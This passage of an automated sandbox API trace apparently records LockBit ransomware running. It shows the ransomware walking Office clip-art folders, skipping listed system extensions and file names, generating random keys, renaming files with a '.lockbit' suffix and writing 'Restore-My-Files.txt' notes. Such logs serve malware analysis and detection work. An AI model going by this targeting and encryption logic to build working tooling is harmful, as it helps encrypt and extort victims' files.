Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.583] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56510d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd90, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187895.WMF", cAlternateFileName="")) returned 1 [0149.583] lstrcmpiW (lpString1=".", lpString2="J0187895.WMF") returned -1 [0149.583] lstrcmpiW (lpString1="..", lpString2="J0187895.WMF") returned -1 [0149.583] PathFindExtensionW (pszPath="J0187895.WMF") returned=".WMF" [0149.583] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.583] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0149.583] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.583] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.584] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.584] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.585] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187895.WMF") returned 1 [0149.585] lstrcmpiW (lpString1="ntldr", lpString2="J0187895.WMF") returned 1 [0149.585] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187895.WMF") returned 1 [0149.585] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187895.WMF") returned -1 [0149.585] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187895.WMF") returned -1 [0149.585] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187895.WMF") returned 1 [0149.585] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187895.WMF") returned -1 [0149.585] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.585] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187895.WMF") returned=".WMF" [0149.585] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.586] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.586] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.587] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187895.WMF.lockbit") returned 72 [0149.587] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187895.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187895.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0149.588] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0149.588] malloc (_Size=0x40068) returned 0x1ff1e60 [0149.588] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3472) returned 1 [0149.588] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.588] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0149.588] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.589] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0149.589] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0149.612] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187895.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187895.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.612] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.612] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0149.615] free (_Block=0x1fa2ed8) [0149.615] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187895.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.615] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.616] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.616] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1388, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187921.WMF", cAlternateFileName="")) returned 1 [0149.616] lstrcmpiW (lpString1=".", lpString2="J0187921.WMF") returned -1 [0149.616] lstrcmpiW (lpString1="..", lpString2="J0187921.WMF") returned -1 [0149.616] PathFindExtensionW (pszPath="J0187921.WMF") returned=".WMF" [0149.616] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.616] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.617] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.617] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187921.WMF") returned 1 [0149.618] lstrcmpiW (lpString1="ntldr", lpString2="J0187921.WMF") returned 1 [0149.618] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187921.WMF") returned 1 [0149.618] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187921.WMF") returned -1 [0149.618] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187921.WMF") returned -1 [0149.618] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187921.WMF") returned 1 [0149.618] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187921.WMF") returned -1 [0149.618] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.618] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187921.WMF") returned=".WMF" [0149.618] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.618] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.618] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.619] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.619] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.619] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.619] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.619] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.619] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.619] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.619] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.619] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.619] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.619] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187921.WMF.lockbit") returned 72 [0149.619] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187921.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187921.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0149.623] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0149.623] malloc (_Size=0x40068) returned 0x3d70450 [0149.623] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=5000) returned 1 [0149.623] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.625] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0149.625] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.626] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0149.626] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0149.629] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187921.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187921.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.629] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.630] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0149.631] free (_Block=0x1fa2ed8) [0149.631] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187921.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.631] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.631] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.631] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56510d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x29dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0188511.WMF", cAlternateFileName="")) returned 1 [0149.631] lstrcmpiW (lpString1=".", lpString2="J0188511.WMF") returned -1 [0149.631] lstrcmpiW (lpString1="..", lpString2="J0188511.WMF") returned -1 [0149.631] PathFindExtensionW (pszPath="J0188511.WMF") returned=".WMF" [0149.631] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.631] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0149.631] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.631] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.631] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.631] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.631] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.631] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.631] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.632] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.632] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.633] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.633] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.633] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.633] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0149.633] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.633] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.633] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.633] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.633] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.633] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.633] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.633] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.633] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0188511.WMF") returned 1 [0149.633] lstrcmpiW (lpString1="ntldr", lpString2="J0188511.WMF") returned 1 [0149.633] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0188511.WMF") returned 1 [0149.633] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0188511.WMF") returned -1 [0149.633] lstrcmpiW (lpString1="autorun.inf", lpString2="J0188511.WMF") returned -1 [0149.633] lstrcmpiW (lpString1="thumbs.db", lpString2="J0188511.WMF") returned 1 [0149.633] lstrcmpiW (lpString1="iconcache.db", lpString2="J0188511.WMF") returned -1 [0149.633] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.633] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188511.WMF") returned=".WMF" [0149.633] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.633] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.633] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.633] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW 